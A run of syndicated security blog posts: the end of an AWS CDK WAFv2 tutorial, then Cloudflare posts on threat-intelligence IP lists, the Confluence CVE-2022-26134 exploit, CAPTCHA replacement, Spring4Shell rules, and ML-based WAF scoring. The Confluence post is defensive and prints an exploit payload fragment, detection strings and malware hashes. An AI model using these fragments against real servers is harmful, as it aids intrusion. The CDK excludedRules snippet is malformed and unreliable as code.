Lastly, let’s understand how we can customize the web ACL further. If a rule of the managed rule group causes undesired behavior in the application, then we can exclude it from the webACL. Assume that we want to exclude the SizeRestrictions_BODY rule, which limits the request body size to 8 KB.

Go back to the definition of the web ACL, and add the highlighted lines:

const cfnWebACL = new wafv2.CfnWebACL(this, 'MyCDKWebAcl', {
      defaultAction: {
        allow: {}
      },
      scope:'REGIONAL',
      visibilityConfig: {
        cloudWatchMetricsEnabled: true,
        metricName:'MetricForWebACLCDK',
        sampledRequestsEnabled: true,
      },
      name:'MyCDKWebAcl',
      rules: [{
        name:'CRSRule',
        priority: 0,
        statement: {
          managedRuleGroupStatement: {
            name: 'AWSManagedRulesCommonRuleSet',
            vendorName: 'AWS',
            excludedRules: [{
             ‘SizeRestrictions_BODY’ }]
          }
        },
        visibilityConfig: {
          cloudWatchMetricsEnabled: true,
          metricName:'MetricForWebACLCDK-CRS',
          sampledRequestsEnabled: true,
        },
        overrideAction: {
          none: {}
        },
      }]

    });

Other customizations you can do include pinning the version of the rule group and narrowing the scope of the request that the rule evaluates, using Scope-down statements.

Conclusion

In this post, you’ve seen how an AWS WAFv2 web ACL can be added to your existing infrastructure defined in AWS CDK. By using Managed Rules, your application benefits from a layer of protection that is curated and maintained by AWS security experts.

As a next step, you can learn how to include AWS WAFv2 metrics from Amazon CloudWatch into your application dashboards. This will give you perspective on how your web application is performing in conjunction with the AWS WAFv2 web ACL.

To learn more about AWS WAFv2 and how to manage web ACL’s, check out the official developer guide.

About the author:

Ramon Lopez

Ramon is a Senior Solutions Architect at AWS, where he guides, educates, and empowers customers of all sizes and industries to build successful businesses in the AWS cloud. He also built web services for 150+ million Amazon Prime customers and led a team of software engineers in a fast-paced global environment. After being immersed in one of the largest micro-service environments, he is a believer in the DevOps mantra of “You build it, you run it”.

New WAF intelligence feeds

Post Syndicated from Daniele Molteni original https://blog.cloudflare.com/new-waf-intelligence-feeds/

New WAF intelligence feeds

New WAF intelligence feeds

Cloudflare is expanding our WAF’s threat intelligence capabilities by adding four new managed IP lists that can be used as part of any custom firewall rule.

Managed lists are created and maintained by Cloudflare and are built based on threat intelligence feeds collected by analyzing patterns and trends observed across the Internet. Enterprise customers can already use the Open SOCKS Proxy list (launched in March 2021) and today we are adding four new IP lists: “VPNs”, “Botnets, Command and Control Servers”, “Malware” and “Anonymizers”.

New WAF intelligence feeds
You can check what rules are available in your plan by navigating to Manage Account → Configuration → Lists.

Customers can reference these lists when creating a custom firewall rule or in Advanced Rate Limiting. For example, you can choose to block all traffic generated by IPs we categorize as VPNs, or rate limit traffic generated by all Anonymizers. You can simply incorporate managed IP lists in the powerful firewall rule builder. Of course, you can also use your own custom IP list.

New WAF intelligence feeds
Managed IP Lists can be used in WAF rules to manage incoming traffic from these IPs.

Where do these feeds come from?

These lists are based on Cloudflare-generated threat feeds which are made available as IP lists to be easily consumed in the WAF. Each IP is categorized by combining open source data as well as by analyzing the behavior of each IP leveraging the scale and reach of Cloudflare network. After an IP has been included in one of these feeds, we verify its categorization and feed this information back into our security systems and make it available to our customers in the form of a managed IP list. The content of each list is updated multiple times a day.

In addition to generating IP classifications based on Cloudflare’s internal data, Cloudflare curates and combines several data sources that we believe provide reliable coverage of active security threats with a low false positive rate. In today’s environment, an IP belonging to a cloud provider might today be distributing malware, but tomorrow might be a critical resource for your company.

Some IP address classifications are publicly available, OSINT data, for example Tor exit nodes, and Cloudflare takes care of integrating this into our Anonymizer list so that you don’t have to manage integrating this list into every asset in your network. Other classifications are determined or vetted using a variety of DNS techniques, like lookup, PTR record lookup, and observing passive DNS from Cloudflare’s network.

Our malware and command-and-control focused lists are generated from curated partnerships, and one type of IP address we target when we select partners is data sources that identify security threats that do not have DNS records associated with them.

Our Anonymizer list encompasses several types of services that perform anonymization, including VPNs, open proxies, and Tor nodes. It is a superset of the more narrowly focused VPN list (known commercial VPN nodes), and the Cloudflare Open Proxies list (proxies that relay traffic without requiring authentication).

In dashboard IP annotations

Using these lists to deploy a preventative security policy for these IPs is great, but what about knowing if an IP that is interacting with your website or application is part of a Botnet or VPN? We first released contextual information for Anonymizers as part of Security Week 2022, but we are now closing the circle by extending this feature to cover all new lists.

As part of Cloudflare’s threat intelligence feeds, we are exposing the IP category directly into the dashboard. Say you are investigating requests that were blocked by the WAF and that looked to be probing your application for known software vulnerabilities. If the source IP of these requests is matching with one of our feeds (for example part of a VPN), contextual information will appear directly on the analytics page.

New WAF intelligence feeds
When the source IP of a WAF event matches one of the threat feeds, we provide contextual information directly onto the Cloudflare dashboard.

This information can help you see patterns and decide whether you need to use the managed lists to handle the traffic from these IPs in a particular way, for example by creating a rate limiting rule that reduces the amount of requests these actors can perform over a period of time.

Who gets this?

The following table summarizes what plans have access to each one of these features. Any paying plans will have access to the contextual in-dash information, while Enterprise will be able to use different managed lists. Managed lists can be used only on Enterprise zones within an Enterprise account.

FREE PRO BIZ ENT Advanced ENT *
Annotations x
Open Proxies x x x
Anonymizers x x x x
VPNs x x x x
Botnets, command and control x x x x
Malware x x x x

* Contact your customer success manager to learn how to get access to these lists.

Future releases

We are working on enriching our threat feeds even further. In the next months we are going to provide more IP lists, specifically we are looking into lists for cloud providers and Carrier-grade Network Address Translation (CG-NAT).

Cloudflare observations of Confluence zero day (CVE-2022-26134)

Post Syndicated from Vaibhav Singhal original https://blog.cloudflare.com/cloudflare-observations-of-confluence-zero-day-cve-2022-26134/

Cloudflare observations of Confluence zero day (CVE-2022-26134)

On 2022-06-02 at 20:00 UTC Attlasian released a Security Advisory relating to a remote code execution (RCE) vulnerability affecting Confluence Server and Confluence Data Center products. This post covers our current analysis of this vulnerability.

When we learned about the vulnerability, Cloudflare’s internal teams immediately engaged to ensure all our customers and our own infrastructure were protected:

  • Our Web Application Firewall (WAF) teams started work on our first mitigation rules that were deployed on 2022-06-02 at 23:38 UTC for all customers.
  • Our internal security team started reviewing our Confluence instances to ensure Cloudflare itself was not impacted.

What is the impact of this vulnerability?

According to Volexity, the vulnerability results in full unauthenticated RCE, allowing an attacker to fully take over the target application.

Active exploits of this vulnerability leverage command injections using specially crafted strings to load a malicious class file in memory, allowing attackers to subsequently plant a webshell on the target machine that they can interact with.

Once the vulnerability is exploited, attackers can implant additional malicious code such as Behinder; a custom webshell called noop.jsp, which replaces the legitimate noop.jsp file located at Confluence root>/confluence/noop.jsp; and another open source webshell called Chopper.

Our observations of exploit attempts in the wild

Once we learned of the vulnerability, we began reviewing  our WAF data to identify activity related to exploitation of the vulnerability. We identified requests matching potentially malicious payloads as early as 2022-05-26 00:33 UTC, indicating that knowledge of the exploit was realized by some attackers prior to the Atlassian security advisory.

Since our mitigation rules were put in place, we have seen a large spike in activity starting from 2022-06-03 10:30 UTC — a little more than 10 hours after the new WAF rules were first deployed. This large spike coincides with the increased awareness of the vulnerability and release of public proof of concepts. Attackers are actively scanning for vulnerable applications at time of writing.

Cloudflare observations of Confluence zero day (CVE-2022-26134)

Although we have seen valid attack payloads since 2022-05-26, many payloads that started matching our initial WAF mitigation rules once the advisory was released were not valid against this specific vulnerability. Examples provided below:

Cloudflare observations of Confluence zero day (CVE-2022-26134)

The activity above indicates that actors were using scanning tools to try and identify the attack vectors. Exact knowledge of how to exploit the vulnerability may have been consolidated amongst select attackers and may not have been widespread.

The decline in WAF rule matches in the graph above after 2022-06-03 23:00 UTC is due to us releasing improved WAF rules. The new, updated rules greatly improved accuracy, reducing the number of false positives, such as the examples above.

A valid malicious URL targeting a vulnerable Confluence application is shown below:

Cloudflare observations of Confluence zero day (CVE-2022-26134)

(Where $HOSTNAME is the host of the target application.)

The URL above will run the contents of the HTTP request post body eval(#parameters.data[0]). Normally this will be a script that will download a web shell to the local server allowing the attacker to run arbitrary code on demand.

Other example URLs, omitting the schema and hostname, include:

Cloudflare observations of Confluence zero day (CVE-2022-26134)

Some of the activity we are observing is indicative of malware campaigns and botnet behavior. It is important to note that given the payload structure, other WAF rules have also been effective at mitigating particular variations of the attack. These include rule PHP100011 and PLONE0002.

Cloudflare’s response to CVE-2022-26134

We have a defense-in-depth approach which uses Cloudflare to protect Cloudflare. We had  high confidence that we were not impacted by this vulnerability due to the security measures in place. We confirmed this by leveraging our detection and response capabilities to sweep all of our internal assets and logs for signs of attempted compromise.

The main actions we took in response to this incident were:

  1. Gathered as much information as possible about the attack.
  2. Engaged our WAF team to start working on mitigation rules for this CVE.
  3. Searched our logs for any signs of compromise.
  4. We searched the logs from our internal Confluence instances for any signs of attempted exploits. We supplemented our assessment with the pattern strings provided by Atlasian: “${“.
  5. Any matches were reviewed to find out if they could be actual exploits. We found no signs that our systems were targeted by actual exploits.
  6. As soon as the WAF team was confident of the quality of the new rules, we started deploying them to all our servers to start protecting our customers as soon as possible. As we also use the WAF for our internal systems, our Confluence instances are also protected by the new WAF rules.
  7. We scrutinized our Confluence servers for signs of compromise and the presence of malicious implants. No signs of compromise were detected.
  8. We deployed rules to our SIEM and monitoring systems to detect any new exploitation attempt against our Confluence instances.

How Cloudflare uses Confluence

Cloudflare uses Confluence internally as our main wiki platform. Many of our teams use Confluence as their main knowledge-sharing platform. Our internal instances are protected by Cloudflare Access. In previous blog posts, we described how we use Access to protect internal resources. This means that every request sent to our Confluence servers must be authenticated and validated in accordance with our Access policies. No unauthenticated access is allowed.

This allowed us to be confident that only Cloudflare users are able to submit requests to our Confluence instances, thus reducing the risk of external exploitation attempts.

What to do if you are using Confluence on-prem

If you are an Atlassian customer for their on-prem products, you should patch to their latest fixed versions. We advise the following actions:

  1. Add Cloudflare Access as an extra protection layer for all your websites. Easy-to-follow instructions to enable Cloudflare Access are available here.
  2. Enable a WAF that includes protection for CVE-2022-26134 in front of your Confluence instances. For more information on how to enable Cloudflare’s WAF and other security products, check here.
  3. Check the logs from your Confluence instances for signs of exploitation attempts. Look for the strings /wiki/ and ${ in the same request.
  4. Use forensic tools and check for signs of post-exploitation tools such as webshells or other malicious implants.

Indicators of compromise and attack

The following indicators are associated with activity observed in the wild by Cloudflare, as described above. These indicators can be searched for against logs to determine if there is compromise in the environment associated with the Confluence vulnerability.

Indicators of Compromise (IOC)

# Type Value Filename/Hash
1 File 50f4595d90173fbe8b85bd78a460375d8d5a869f1fef190f72ef993c73534276 Filename: 45.64.json
Malicious file associated with exploit
2 File b85c16a7a0826edbcddbd2c17078472169f8d9ecaa7209a2d3976264eb3da0cc Filename: 45.64.rar
Malicious file associated with exploit
3 File 90e3331f6dd780979d22f5eb339dadde3d9bcf51d8cb6bfdc40c43d147ecdc8c Filename: 45.640.txt
Malicious file associated with exploit
4 File 1905fc63a9490533dc4f854d47c7cb317a5f485218173892eafa31d7864e2043 Filename: 45.647.txt
Malicious file associated with exploit
5 File 5add63588480287d1aee01e8dd267340426df322fe7a33129d588415fd6551fc Filename: lan (perl script)
Malicious file associated with exploit
6 File 67c2bae1d5df19f5f1ac07f76adbb63d5163ec2564c4a8310e78bcb77d25c988 Filename: jui.sh
Malicious file associated with exploit
7 File 281a348223a517c9ca13f34a4454a6fdf835b9cb13d0eb3ce25a76097acbe3fb Filename: conf
Malicious file associated with exploit

Indicators of Attack (IOA)

# Type Value Hash
1 URL String ${ String used to craft malicious payload
2 URL String javax.script.ScriptEngineManager String indicative of ScriptEngine manager to craft malicious payloads

The end of the road for Cloudflare CAPTCHAs

Post Syndicated from Reid Tatoris original https://blog.cloudflare.com/end-cloudflare-captcha/

The end of the road for Cloudflare CAPTCHAs

The end of the road for Cloudflare CAPTCHAs

There is no point in rehashing the fact that CAPTCHA provides a terrible user experience. It’s been discussed in detail before on this blog, and countless times elsewhere. One of the creators of the CAPTCHA has publicly lamented that he “unwittingly created a system that was frittering away, in ten-second increments, millions of hours of a most precious resource: human brain cycles.” We don’t like them, and you don’t like them.

So we decided we’re going to stop using CAPTCHAs. Using an iterative platform approach, we have already reduced the number of CAPTCHAs we choose to serve by 91% over the past year.

Before we talk about how we did it, and how you can help, let’s first start with a simple question.

Why in the world is CAPTCHA still used anyway?

If everyone agrees CAPTCHA is so bad, if there have been calls to get rid of it for 15 years, if the creator regrets creating it, why is it still widely used?

The frustrating truth is that CAPTCHA remains an effective tool for differentiating real human users from bots despite the existence of CAPTCHA-solving services. Of course, this comes with a huge trade off in terms of usability, but generally the alternatives to CAPTCHA are blocking or allowing traffic, which will inherently increase either false positives or false negatives. With a choice between increased errors and a poor user experience (CAPTCHA), many sites choose CAPTCHA.

CAPTCHAs are also a safe choice because so many other sites use them. They delegate abuse response to a third party, and remove the risk from the website with a simple integration. Using the most common solution will rarely get you into trouble. Plug, play, forget.

Lastly, CAPTCHA is useful because it has a long history of a known and stable baseline. We’ve tracked a metric called CAPTCHA (or Challenge) Solve Rate for many years. CAPTCHA solve rate is the number of CAPTCHAs solved, divided by the number of page loads. For our purposes both failing or not attempting to solve the CAPTCHA count as a failure, since in either case a user cannot access the content they want to. We find this metric to typically be stable for any particular website. That is, if the solve rate is 1%, it tends to remain at 1% over time. We also find that any change in solve rate – up or down – is a strong indicator of an attack in progress. Customers can monitor the solve rate and create alerts to notify them when it changes, then investigate what might be happening.

Many alternatives to CAPTCHA have been tried, including our own Cryptographic Attestation. However, to date, none have seen the amount of widespread adoption of CAPTCHAs. We believe attempting to replace CAPTCHA with a single alternative is the main reason why. When you replace CAPTCHA, you lose the stable history of the solve rate, and making decisions becomes more difficult. If you switch from deciphering text to picking images, you will get vastly different results. How do you know if those results are good or bad? So, we took a different approach.

Many solutions, not one

Rather than try to unilaterally deprecate and replace CAPTCHA with a single alternative, we built a platform to test many alternatives and see which had the best potential to replace CAPTCHA. We call this Cloudflare Managed Challenge.

The end of the road for Cloudflare CAPTCHAs

Managed Challenge is a smarter solution than CAPTCHA. It defers the decision about whether to serve a visual puzzle to a later point in the flow after more information is available from the browser. Previously, a Cloudflare customer could only choose between either a CAPTCHA or JavaScript Challenge as the action of a security or firewall rule. Now, the Managed Challenge option will decide to show a visual puzzle or other means of proving humanness to visitors based on the client behavior exhibited during a challenge and based on the telemetry we receive from the visitor. A customer simply tells us, “I want you (Cloudflare) to take appropriate actions to challenge this type of traffic as you see necessary.

With Managed Challenge, we adapt the actual challenge outcome to the individual visitor/browser. As a result, we can fine-tune the difficulty of the challenge itself and avoid showing visual puzzles to more than 90% of human requests, while at the same time presenting harder challenges to visitors that exhibit non-human behaviors.

When a visitor encounters a Managed Challenge, we first run a series of small non-interactive JavaScript challenges gathering more signals about the visitor/browser environment. This means we deploy in-browser detections and challenges at the time the request is made. Challenges are selected based on what characteristics the visitor emits and based on the initial information we have about the visitor. Those challenges include, but are not limited to, proof-of-work, proof-of-space, probing for web APIs, and various challenges for detecting browser-quirks and human behavior.

They also include machine learning models that detect common features of end visitors who were able to pass a CAPTCHA before. The computational hardness of those initial challenges may vary by visitor, but is targeted to run fast. Managed Challenge is also integrated into the Cloudflare Bot Management and Super Bot Fight Mode systems by consuming signals and data from the bot detections.

After our non-interactive challenges have been run, we evaluate the gathered signals. If by the combination of those signals we are confident that the visitor is likely human, no further action is taken, and the visitor is redirected to the destined page without any interaction required. However, in some cases, if the signal is weak, we present a visual puzzle to the visitor to prove their humanness. In the context of Managed Challenge, we’re also experimenting with other privacy-preserving means of attesting humanness, to continue reducing the portion of time that Managed Challenge uses a visual puzzle step.

We started testing Managed Challenge last year, and initially, we chose from a rotating subset of challenges, one of them being CAPTCHA. At the start, CAPTCHA was still used in the vast majority of cases. We compared the solve rate for the new challenge in question, with the existing, stable solve rate for CAPTCHA. We thus used CAPTCHA solve rate as a goal to work towards as we improved our CAPTCHA alternatives, getting better and better over time. The challenge platform allows our engineers to easily create, deploy, and test new types of challenges without impacting customers. When a challenge turns out to not be useful, we simply deprecate it. When it proves to be useful, we increase how often it is used. In order to preserve ground-truth, we also randomly choose a small subset of visitors to always solve a visual puzzle to validate our signals.

Managed Challenge performs better than CAPTCHA

The Challenge Platform now has the same stable solve rate as previously used CAPTCHAs.

The end of the road for Cloudflare CAPTCHAs

Using an iterative platform approach, we have reduced the number of CAPTCHAs we serve by 91%. This is only the start. By the end of the year, we will reduce our use of CAPTCHA as a challenge to less than 1%. By skipping the visual puzzle step for almost all visitors, we are able to reduce the visitor time spent in a challenge from an average of 32 seconds to an average of just one second to run our non-interactive challenges. We also see churn improvements: our telemetry indicates that visitors with human properties are 31% less likely to abandon a Managed Challenge than on the traditional CAPTCHA action.

Today, the Managed Challenge platform rotates between many challenges. A Managed Challenge instance consists of many sub-challenges: some of them are established and effective, whereas others are new challenges we are experimenting with. All of them are much, much faster and easier for humans to complete than CAPTCHA, and almost always require no interaction from the visitor.

Managed Challenge replaces CAPTCHA for Cloudflare

We have now deployed Managed Challenge across the entire Cloudflare network. Any time we show a CAPTCHA to a visitor, it’s via the Managed Challenge platform, and only as a benchmark to confirm our other challenges are performing as well.

All Cloudflare customers can now choose Managed Challenge as a response option to any Firewall rule instead of CAPTCHA. We’ve also updated our dashboard to encourage all Cloudflare customers to make this choice.

The end of the road for Cloudflare CAPTCHAs

You’ll notice that we changed the name of the CAPTCHA option to ‘Legacy CAPTCHA’. This more accurately describes what CAPTCHA is: an outdated tool that we don’t think people should use. As a result, the usage of CAPTCHA across the Cloudflare network has dropped significantly, and usage of managed challenge has increased dramatically.

The end of the road for Cloudflare CAPTCHAs

As noted above, today CAPTCHA represents 9% of Managed Challenge solves (light blue), but that number will decrease to less than 1% by the end of the year. You’ll also see the gray bar above, which shows when our customers have chosen to show a CAPTCHA as a response to a Firewall rule triggering. We want that number to go to zero, but the good news is that 63% of customers now choose Managed Challenge rather than CAPTCHA when they create a Firewall rule with a challenge response action.

The end of the road for Cloudflare CAPTCHAs

We expect this number to increase further over time.

If you’re using the Cloudflare WAF, log into the Dashboard today and look at all of your Firewall rules. If any of your rules are using “Legacy CAPTCHA” as a response, please change it now! Select the “Managed Challenge” response option instead. You’ll give your users a better experience, while maintaining the same level of protection you have today. If you’re not currently a Cloudflare customer, stay tuned for ways you can reduce your own use of CAPTCHA.

WAF mitigations for Spring4Shell

Post Syndicated from Michael Tremante original https://blog.cloudflare.com/waf-mitigations-sping4shell/

WAF mitigations for Spring4Shell

WAF mitigations for Spring4Shell

A set of high profile vulnerabilities have been identified affecting the popular Java Spring Framework and related software components – generally being referred to as Spring4Shell.

Four CVEs have been released so far and are being actively updated as new information emerges. These vulnerabilities can result, in the worst case, in full remote code execution (RCE) compromise:

Customers using Java Spring and related software components, such as the Spring Cloud Gateway, should immediately review their software and update to the latest versions by following the official Spring project guidance.

The Cloudflare WAF team is actively monitoring these CVEs and has already deployed a number of new managed mitigation rules. Customers should review the rules listed below to ensure they are enabled while also patching the underlying Java Spring components.

CVE-2022-22947

A new rule has been developed and deployed for this CVE with an emergency release on March 29:

Managed Rule Spring – CVE:CVE-2022-22947

  • WAF rule ID: e777f95584ba429796856007fbe6c869
  • Legacy rule ID: 100522

Note that the above rule is disabled by default and may cause some false positives. We advise customers to review rule matches or to deploy the rule with a LOG action before switching to BLOCK.

CVE-2022-22950

Currently, available PoCs are blocked by the following rule:

Managed Rule PHP – Code Injection

  • WAF rule ID: 55b100786189495c93744db0e1efdffb
  • Legacy rule ID: PHP100011

CVE-2022-22963

Currently, available PoCs are blocked by the following rule:

Managed Rule Plone – Dangerous File Extension

  • WAF rule ID: aa3411d5505b4895b547d68950a28587
  • Legacy WAF ID: PLONE0001

We also deployed a new rule via an emergency release on March 31 (today at time of writing) to cover additional variations attempting to exploit this vulnerability:

Managed Rule Spring – Code Injection

  • WAF rule ID: d58ebf5351d843d3a39a4480f2cc4e84
  • Legacy WAF ID: 100524

Note that the newly released rule is disabled by default and may cause some false positives. We advise customers to review rule matches or to deploy the rule with a LOG action before switching to BLOCK.

Additionally, customers can receive protection against this CVE by deploying the Cloudflare OWASP Core Ruleset with default or better settings on our new WAF. Customers using our legacy WAF will have to configure a high OWASP sensitivity level.

CVE-2022-22965

We are currently investigating this recent CVE and will provide an update to our Managed Ruleset as soon as possible if an applicable mitigation strategy or bypass is found. Please review and monitor our public facing change log.

WAF for everyone: protecting the web from high severity vulnerabilities

Post Syndicated from Michael Tremante original https://blog.cloudflare.com/waf-for-everyone/

WAF for everyone: protecting the web from high severity vulnerabilities

WAF for everyone: protecting the web from high severity vulnerabilities

At Cloudflare, we like disruptive ideas. Pair that with our core belief that security is something that should be accessible to everyone and the outcome is a better and safer Internet for all.

This isn’t idle talk. For example, back in 2014, we announced Universal SSL. Overnight, we provided SSL/TLS encryption to over one million Internet properties without anyone having to pay a dime, or configure a certificate. This was good not only for our customers, but also for everyone using the web.

In 2017, we announced unmetered DDoS mitigation. We’ve never asked customers to pay for DDoS bandwidth as it never felt right, but it took us some time to reach the network size where we could offer completely unmetered mitigation for everyone, paying customer or not.

Still, I often get the question: how do we do this? It’s simple really. We do it by building great, efficient technology that scales well—and this allows us to keep costs low.

Today, we’re doing it again, by providing a Cloudflare WAF (Web Application Firewall) Managed Ruleset to all Cloudflare plans, free of charge.

Why are we doing this?

High profile vulnerabilities have a major impact across the Internet affecting organizations of all sizes. We’ve recently seen this with Log4J, but even before that, major vulnerabilities such as Shellshock and Heartbleed have left scars across the Internet.

Small application owners and teams don’t always have the time to keep up with fast moving security related patches, causing many applications to be compromised and/or used for nefarious purposes.

With millions of Internet properties behind the Cloudflare proxy, we have a duty to help keep the web safe. And that is what we did with Log4J by deploying mitigation rules for all traffic, including FREE zones. We are now formalizing our commitment by providing a Cloudflare Free Managed Ruleset to all plans on top of our new WAF engine.

When are we doing this?

If you are on a FREE plan, you are already receiving protection. Over the coming months, all our FREE zone plan users will also receive access to the Cloudflare WAF user interface in the dashboard and will be able to deploy and configure the new ruleset. This ruleset will provide mitigation rules for high profile vulnerabilities such as Shellshock and Log4J among others.

To access our broader set of WAF rulesets (Cloudflare Managed Rules, Cloudflare OWASP Core Ruleset and Cloudflare Leaked Credential Check Ruleset) along with advanced WAF features, customers will still have to upgrade to PRO or higher plans.

The Challenge

With over 32 million HTTP requests per second being proxied by the Cloudflare global network, running the WAF on every single request is no easy task.

WAFs secure all HTTP request components, including bodies, by running a set of rules, sometimes referred as signatures, that look for specific patterns that could represent a malicious payload. These rules vary in complexity, and the more rules you have, the harder the system is to optimize. Additionally, many rules will take advantage of regex capabilities, allowing the author to perform complex matching logic.

All of this needs to happen with a negligible latency impact, as security should not come with a performance penalty and many application owners come to Cloudflare for performance benefits.

By leveraging our new Edge Rules Engine, on top of which the new WAF has been built on, we have been able to reach the performance and memory milestones that make us feel comfortable and that allow us to provide a good baseline WAF protection to everyone. Enter the new Cloudflare Free Managed Ruleset.

The Free Cloudflare Managed Ruleset

This ruleset is automatically deployed on any new Cloudflare zone and is specially designed to reduce false positives to a minimum across a very broad range of traffic types. Customers will be able to disable the ruleset, if necessary, or configure the traffic filter or individual rules. As of today, the ruleset contains the following rules:

  • Log4J rules matching payloads in the URI and HTTP headers;
  • Shellshock rules;
  • Rules matching very common WordPress exploits;
WAF for everyone: protecting the web from high severity vulnerabilities

Whenever a rule matches, an event will be generated in the Security Overview tab, allowing you to inspect the request.

Deploying and configuring

For all new FREE zones, the ruleset will be automatically deployed. The rules are battle tested across the Cloudflare network and are safe to deploy on most applications out of the box. Customers can, in any case, configure the ruleset further by:

  • Overriding all rules to LOG or other action.
  • Overriding specific rules only to LOG or other action.
  • Completely disabling the ruleset or any specific rule.

All options are easily accessible via the dashboard, but can also be performed via API. Documentation on how to configure the ruleset, once it is available in the UI, will be found on our developer site.

What’s next?

The Cloudflare Free Managed Ruleset will be updated by Cloudflare whenever a relevant wide-ranging vulnerability is discovered. Updates to the ruleset will be published on our change log,  like that customers can keep up to date with any new rules.

We love building cool new technology. But we also love making it widely available and easy to use. We’re really excited about making the web much safer for everyone with a WAF that won’t cost you a dime. If you’re interested in getting started, just head over here to sign up for our free plan.

Improving the WAF with Machine Learning

Post Syndicated from Daniele Molteni original https://blog.cloudflare.com/waf-ml/

Improving the WAF with Machine Learning

Improving the WAF with Machine Learning

Cloudflare handles 32 million HTTP requests per second and is used by more than 22% of all the websites whose web server is known by W3Techs. Cloudflare is in the unique position of protecting traffic for 1 out of 5 Internet properties which allows it to identify threats as they arise and track how these evolve and mutate.

The Web Application Firewall (WAF) sits at the core of Cloudflare’s security toolbox and  Managed Rules are a key feature of the WAF. They are a collection of rules created by Cloudflare’s analyst team that block requests when they show patterns of known attacks. These managed rules work extremely well for patterns of established attack vectors, as they have been extensively tested to minimize both false negatives (missing an attack) and false positives (finding an attack when there isn’t one). On the downside, managed rules often miss attack variations (also known as bypasses) as static regex-based rules are intrinsically sensitive to signature variations introduced, for example, by fuzzing techniques.

We witnessed this issue when we released protections for log4j. For a few days, after the vulnerability was made public, we had to constantly update the rules to match variations and mutations as attackers tried to bypass the WAF. Moreover, optimizing rules requires significant human intervention, and it usually works only after bypasses have been identified or even exploited, making the protection reactive rather than proactive.

Today we are excited to complement managed rulesets (such as OWASP and Cloudflare Managed) with a new tool aimed at identifying bypasses and malicious payloads without human involvement, and before they are exploited. Customers can now access signals from a machine learning model trained on the good/bad traffic as classified by managed rules and augmented data to provide better protection across a broader range of old and new attacks.

Welcome to our new Machine Learning WAF detection.

The new detection is available in Early Access for Enterprise, Pro and Biz customers. Please join the waitlist if you are interested in trying it out. In the long term, it will be available to the higher tier customers.

Improving the WAF with learning capabilities

The new detection system complements existing managed rulesets by providing three major advantages:

  1. It runs on all of your traffic. Each request is scored based on the likelihood that it contains a SQLi or XSS attack, for example. This enables a new WAF analytics experience that allows you to explore trends and patterns in your overall traffic.
  2. Detection rate improves based on past traffic and feedback. The model is trained on good and bad traffic as categorized by managed rules across all Cloudflare traffic. This allows small sites to get the same level of protection as the largest Internet properties.
  3. A new definition of performance. The machine learning engine identifies bypasses and anomalies before they are exploited or identified by human researchers.

The secret sauce is a combination of innovative machine learning modeling, a vast training dataset built on the attacks we block daily as well as data augmentation techniques, the right evaluation and testing framework based on the behavioral testing principle and cutting-edge engineering that allows us to assess each request with negligible latency.

A new WAF experience

The new detection is based on the paradigm launched with Bot Analytics. Following this approach, each request is evaluated, and a score assigned, regardless of whether we are taking actions on it. Since we score every request, users can visualize how the score evolves over time for the entirety of the traffic directed to their server.

Improving the WAF with Machine Learning

Furthermore, users can visualize the histogram of how requests were scored for a specific attack vector (such as SQLi) and find what score is a good value to separate good from bad traffic.

The actual mitigation is performed with custom WAF rules where the score is used to decide which requests should be blocked. This allows customers to create rules whose logic includes any parameter of the HTTP requests, including the dynamic fields populated by Cloudflare, such as bot scores.

Improving the WAF with Machine Learning

We are now looking at extending this approach to work for the managed rules too (OWASP and Cloudflare Managed). Customers will be able to identify trends and create rules based on patterns that are visible when looking at their overall traffic; rather than creating rules based on trial and error, log traffic to validate them and finally enforce protection.

How does it work?

Machine learning–based detections complement the existing managed rulesets, such as OWASP and Cloudflare Managed. The system is based on models designed to identify variations of attack patterns and anomalies without the direct supervision of researchers or the end user.

As of today, we expose scores for two attack vectors: SQL injection and Cross Site Scripting. Users can create custom WAF/Firewall rules using three separate scores: a total score (cf.waf.ml.score), one for SQLi and one for XSS (cf.waf.ml.score.sqli, cf.waf.ml.score.xss, respectively). The scores can have values between 1 and 99, with 1 being definitely malicious and 99 being valid traffic.

Improving the WAF with Machine Learning

The model is then trained based on traffic classified by the existing WAF rules, and it works on a transformed version of the original request, making it easier to identify fingerprints of attacks.

For each request, the model scores each part of the request independently so that it’s possible to identify where malicious payloads were identified, for example, in the body of the request, the URI or headers.

Improving the WAF with Machine Learning

This looks easy on paper, but there are a number of challenges that Cloudflare engineers had to solve to get here. This includes how to build a reliable dataset, scalable data labeling, selecting the right model architecture, and the requirement for executing the categorization on every request processed by Cloudflare’s global network (i.e. 32 million times per seconds).

In the coming weeks, the Engineering team will publish a series of blog posts which will give a better understanding of how the solution works under the hood.

Looking forward

In the next months, we are going to release the new detection engine to customers and collect their feedback on its performance. Long term, we are planning to extend the detection engine to cover all attack vectors already identified by managed rules and use the attacks blocked by the machine learning model to further improve our managed rulesets.

A new WAF experience

Post Syndicated from Zhiyuan Zheng original https://blog.cloudflare.com/new-waf-experience/

A new WAF experience

A new WAF experience

Around three years ago, we brought multiple features into the Firewall tab in our dashboard navigation, with the motivation “to make our products and services intuitive.” With our hard work in expanding capabilities offerings in the past three years, we want to take another opportunity to evaluate the intuitiveness of Cloudflare WAF (Web Application Firewall).

Our customers lead the way to new WAF

The security landscape is moving fast; types of web applications are growing rapidly; and within the industry there are various approaches to what a WAF includes and can offer. Cloudflare not only proxies enterprise applications, but also millions of personal blogs, community sites, and small businesses stores. The diversity of use cases are covered by various products we offer; however, these products are currently scattered and that makes visibility of active protection rules unclear. This pushes us to reflect on how we can best support our customers in getting the most value out of WAF by providing a clearer offering that meets expectations.

A few months ago, we reached out to our customers to answer a simple question: what do you consider to be part of WAF? We employed a range of user research methods including card sorting, tree testing, design evaluation, and surveys to help with this. The results of this research illustrated how our customers think about WAF, what it means to them, and how it supports their use cases. This inspired the product team to expand scope and contemplate what (Web Application) Security means, beyond merely the WAF.

Based on what hundreds of customers told us, our user research and product design teams collaborated with product management to rethink the security experience. We examined our assumptions and assessed the effectiveness of design concepts to create a structure (or information architecture) that reflected our customers’ mental models.

This new structure consolidates firewall rules, managed rules, and rate limiting rules to become a part of WAF. The new WAF strives to be the one-stop shop for web application security as it pertains to differentiating malicious from clean traffic.

As of today, you will see the following changes to our navigation:

  1. Firewall is being renamed to Security.
  2. Under Security, you will now find WAF.
  3. Firewall rules, managed rules, and rate limiting rules will now appear under WAF.

From now on, when we refer to WAF, we will be referring to above three features.

